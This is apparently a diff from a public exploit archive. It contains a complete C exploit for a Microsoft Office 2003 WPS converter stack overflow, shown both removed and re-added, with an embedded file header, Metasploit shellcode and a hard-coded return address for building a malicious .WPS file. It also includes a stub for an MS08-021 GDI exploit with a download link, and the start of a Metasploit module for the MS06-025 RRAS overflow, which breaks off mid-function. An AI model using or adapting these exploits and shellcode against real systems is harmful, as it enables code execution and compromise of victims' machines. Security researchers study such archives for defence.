-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x43\x48\x4e\x4b\x57\x4b\x53\x20\x04\x00\x08\x00\x0e\x00\x00\x03"
-"\x00\x02\x00\x00\x00\x0a\x00\x00\xf8\x01\x0e\x00\xff\xff\xff\xff"
-"\x18\x00\x54\x45\x58\x54\x00\x00\x2f\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
-
-/* Shellcode - metasploit exec calc.exe */
-unsigned char uszShellcode[] =
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
-"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
-"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
-"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
-"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
-"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
-"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
-"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
-"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
-"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
-"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
-"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
-"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
-"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
-"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
-"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
-"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
-"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
-"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
-"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
-"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";
-
-char szIntro[] =
-"\n\t\tMicrosoft Office .WPS Stack Overflow\n"
-"\t\t\tAdam Walker (c) 2007\n"
-"[+] Targets:\n"
-"\t(1) Windows XP SP2 ntdll.dll de\n"
-"Usage: wps.exe <target> <file>";
-
-typedef struct {
-	const char *szTarget;
-	unsigned char uszRet[5];
-} TARGET;
-
-TARGET targets[] = {
-	{ "Windows XP SP2 de ntdll.dll", "\xED\x1E\x94\x7C" },		/* jmp esp */
-};
-
-int main( int argc, char **argv ) {
-	char szBuffer[1024*10];
-	FILE *f;
-	void *pExitProcess[4];
-
-	if ( argc < 3 ) {
-		printf("%s\n", szIntro );
-		return 0;
-	}
-	
-	memset(szBuffer, 0x90, 1024*10);
-	
-	printf("[+] Creating WPS header...\n");
-	memcpy( szBuffer, uszWpsHeader, sizeof( uszWpsHeader ) - 1 );
-
-	printf("[+] Copying addr && nops && shellcode...\n");
-	memcpy( szBuffer + sizeof( uszWpsHeader ) - 1, targets[atoi( argv[1] + 1 )].uszRet, 4 );
-	memcpy( szBuffer + sizeof( uszWpsHeader ) + 3, uszShellcode, sizeof( uszShellcode ) - 1 );
-
-	f = fopen( argv[2], "wb" );
-	if ( f == NULL ) {
-		printf("[-] Cannot create file\n");
-		return 0;
-	}
-
-	fwrite( szBuffer, 1, sizeof( szBuffer) , f );
-	fclose( f );
-	printf("[+] .WPS file succesfully created!\n");
-	return 0;
-}
-
-// milw0rm.com [2008-02-13]
+/*
+* Copyright (c) 2008 chujwamwdupe - pumpernikiel.c
+*
+* one day in teletubby land...
+*
+* an email from idefense:
+* 
+* "Unfortunately, Microsoft has refused to credit you using the name you requested."
+*
+* ...what's wrong with 'chujwamwdupe', eh?
+*
+*
+* Description:
+*    A vulnerability exists in WPS to RTF convert filter that is part
+*    of Microsoft Office 2003. It could be exploited by remote attacker
+*    to take complete control of an affected system. This issue is due to
+*    stack overflow error in function that read secions from WPS file.
+*    When we change size of for example TEXT section to number langer than
+*    0x10, stack overflow occurs - very easy to exploit.
+*
+*
+* Tested on:
+*	  Microsoft Windows XP Service Pack 2 && Microsoft Office 2003
+* 
+* Usage:
+*     wps.exe 1 evil.wps
+*
+*/
+
+#include <stdio.h>
+#include <windows.h>
+
+/* WPS Header */
+unsigned char uszWpsHeader[] =
+"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09\x00"
+"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
+"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00"
+"\x01\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xfd\xff\xff\xff\xfe\xff\xff\xff\xfe\xff\xff\xff\x04\x00\x00\x00"
+"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00"
+"\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x52\x00\x6f\x00\x6f\x00\x74\x00\x20\x00\x45\x00\x6e\x00\x74\x00"
+"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x16\x00\x05\x00\xff\xff\xff\xff\xff\xff\xff\xff\x01\x00\x00\x00"
+"\xb2\x5a\xa4\x0e\x0a\x9e\xd1\x11\xa4\x07\x00\xc0\x4f\xb9\x32\xba"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x10\xb9\x5f"
+"\x53\x8f\xc7\x01\x03\x00\x00\x00\xc0\x0a\x00\x00\x00\x00\x00\x00"
+"\x43\x00\x4f\x00\x4e\x00\x54\x00\x45\x00\x4e\x00\x54\x00\x53\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x12\x00\x02\x01\x02\x00\x00\x00\x03\x00\x00\x00\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00"
+"\x01\x00\x43\x00\x6f\x00\x6d\x00\x70\x00\x4f\x00\x62\x00\x6a\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x28\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x00"
+"\x53\x00\x50\x00\x45\x00\x4c\x00\x4c\x00\x49\x00\x4e\x00\x47\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x2a\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00"
+"\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00"
+"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00"
+"\x09\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00"
+"\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x10\x00\x00\x00"
+"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00"
+"\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00"
+"\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x1c\x00\x00\x00"
+"\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x20\x00\x00\x00"
+"\x21\x00\x00\x00\x22\x00\x00\x00\x23\x00\x00\x00\x24\x00\x00\x00"
+"\x25\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\xfe\xff\xff\xff"
+"\x29\x00\x00\x00\xfe\xff\xff\xff\xfe\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x43\x48\x4e\x4b\x57\x4b\x53\x20\x04\x00\x08\x00\x0e\x00\x00\x03"
+"\x00\x02\x00\x00\x00\x0a\x00\x00\xf8\x01\x0e\x00\xff\xff\xff\xff"
+"\x18\x00\x54\x45\x58\x54\x00\x00\x2f\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
+
+/* Shellcode - metasploit exec calc.exe */
+unsigned char uszShellcode[] =
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
+"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
+"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
+"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
+"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
+"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
+"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
+"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
+"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
+"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
+"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
+"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
+"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
+"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
+"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
+"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
+"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
+"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
+"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
+"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";
+
+char szIntro[] =
+"\n\t\tMicrosoft Office .WPS Stack Overflow\n"
+"\t\t\tAdam Walker (c) 2007\n"
+"[+] Targets:\n"
+"\t(1) Windows XP SP2 ntdll.dll de\n"
+"Usage: wps.exe <target> <file>";
+
+typedef struct {
+	const char *szTarget;
+	unsigned char uszRet[5];
+} TARGET;
+
+TARGET targets[] = {
+	{ "Windows XP SP2 de ntdll.dll", "\xED\x1E\x94\x7C" },		/* jmp esp */
+};
+
+int main( int argc, char **argv ) {
+	char szBuffer[1024*10];
+	FILE *f;
+	void *pExitProcess[4];
+
+	if ( argc < 3 ) {
+		printf("%s\n", szIntro );
+		return 0;
+	}
+	
+	memset(szBuffer, 0x90, 1024*10);
+	
+	printf("[+] Creating WPS header...\n");
+	memcpy( szBuffer, uszWpsHeader, sizeof( uszWpsHeader ) - 1 );
+
+	printf("[+] Copying addr && nops && shellcode...\n");
+	memcpy( szBuffer + sizeof( uszWpsHeader ) - 1, targets[atoi( argv[1] + 1 )].uszRet, 4 );
+	memcpy( szBuffer + sizeof( uszWpsHeader ) + 3, uszShellcode, sizeof( uszShellcode ) - 1 );
+
+	f = fopen( argv[2], "wb" );
+	if ( f == NULL ) {
+		printf("[-] Cannot create file\n");
+		return 0;
+	}
+
+	fwrite( szBuffer, 1, sizeof( szBuffer) , f );
+	fclose( f );
+	printf("[+] .WPS file succesfully created!\n");
+	return 0;
+}
+
+// milw0rm.com [2008-02-13]

platforms/windows/local/5442.cpp

@@ -1,15 +1,15 @@
-/////////////////////////////////////////////////////////////
-///Exploit the MS08-021 : Stack Overflow on GDI API
-///Author: Lamhtz
-///Date: April 14th, 2008
-///Usage: <appname.exe> [filename]
-///Function: Generate a crafted emf file which could 
-///          automatically run calc.exe in Win2kSP4 CHS Version
-///			 with MS07-046 patched but no MS08-021 is installed.
-///			 In Windows XP SP2, explorer.exe will crashed but
-///          calc will not be run.
-/////////////////////////////////////////////////////////////
-
-http://www.milw0rm.com/sploits/2008-exploit_08021.zip
-
-// milw0rm.com [2008-04-14]
+/////////////////////////////////////////////////////////////
+///Exploit the MS08-021 : Stack Overflow on GDI API
+///Author: Lamhtz
+///Date: April 14th, 2008
+///Usage: <appname.exe> [filename]
+///Function: Generate a crafted emf file which could 
+///          automatically run calc.exe in Win2kSP4 CHS Version
+///			 with MS07-046 patched but no MS08-021 is installed.
+///			 In Windows XP SP2, explorer.exe will crashed but
+///          calc will not be run.
+/////////////////////////////////////////////////////////////
+
+http://www.milw0rm.com/sploits/2008-exploit_08021.zip
+
+// milw0rm.com [2008-04-14]

platforms/windows/remote/1965.pm

@@ -1,261 +1,260 @@
-
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::rras_ms06_025_rasman;
-use base "Msf::Exploit";
-use strict;
-
-use Pex::DCERPC;
-use Pex::SMB;
-use Pex::NDR;
-
-my $advanced = {
-	'FragSize'    => [ 256, 'The DCERPC fragment size' ],
-	'BindEvasion' => [ 0,   'IDS Evasion of the Bind request' ],
-	'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
-  };
-
-my $info = {
-	'Name'    => 'Microsoft RRAS MSO6-025 RASMAN Registry Stack Overflow',
-	'Version' => '$Revision: 1.1 $',
-	'Authors' =>
-	  [
-		'Pusscat <pusscat [at] gmail.com>',
-		'H D Moore <hdm [at] metasploit.com>'
-	  ],
-
-	'Arch' => ['x86'],
-	'OS'   => [ 'win32', 'win2000', 'winxp' ],
-	'Priv' => 1,
-
-	'AutoOpts' => { 'EXITFUNC' => 'thread' },
-	'UserOpts' =>
-	  {
-		'RHOST' => [ 1, 'ADDR', 'The target address' ],
-
-		# SMB connection options
-		'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
-		'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username',''],
-		'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
-		'SMBPIPE' => [ 1, 'DATA', 'The pipe name to use (2000=ROUTER, XP=SRVSVC)', 'ROUTER' ],
-	  },
-
-	'Payload' =>
-	  {
-		'Space'    =>1024,
-		'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",
-
-		# sub esp, 4097 + inc esp makes stack happy
-		'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
-	  },
-
-	'Description' => Pex::Text::Freeform(
-		qq{
-    		This module exploits a registry-based stack overflow in the Windows Routing 
-			and Remote Access Service. Since the service is hosted inside svchost.exe, 
-			a failed exploit attempt can cause other system services to fail as well. 
-			A valid username and password is required to exploit this flaw on Windows 2000. 
-			When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
-			Exploiting this flaw involves two distinct steps - creating the registry key
-			and then triggering an overwrite based on a read of this key. Once the key is
-			created, it cannot be recreated. This means that for any given system, you
-			only get one chance to exploit this flaw. Picking the wrong target will require
-			a manual removal of the following registry key before you can try again:
-			HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
-}
-	  ),
-
-	'Refs' =>
-	  [
-		[ 'BID', '18325' ],
-		[ 'CVE', '2006-2370' ],
-		[ 'OSVDB', '26437' ],
-		[ 'MSB', 'MS06-025' ]
-	  ],
-
-	'DefaultTarget' => 0,
-	'Targets'       =>
-	  [
-		[ 'Automatic' ],
-		[ 'Windows 2000',   0x750217ae ], # call esi
-	  ],
-
-	'Keys' => ['rras'],
-
-	'DisclosureDate' => 'Jun 13 2006',
-  };
-
-sub new {
-	my ($class) = @_;
-	my $self    = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
-	return ($self);
-}
-
-sub Exploit {
-	my ($self)      = @_;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-	my $target_idx  = $self->GetVar('TARGET');
-	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
-	my $target      = $self->Targets->[$target_idx];
-
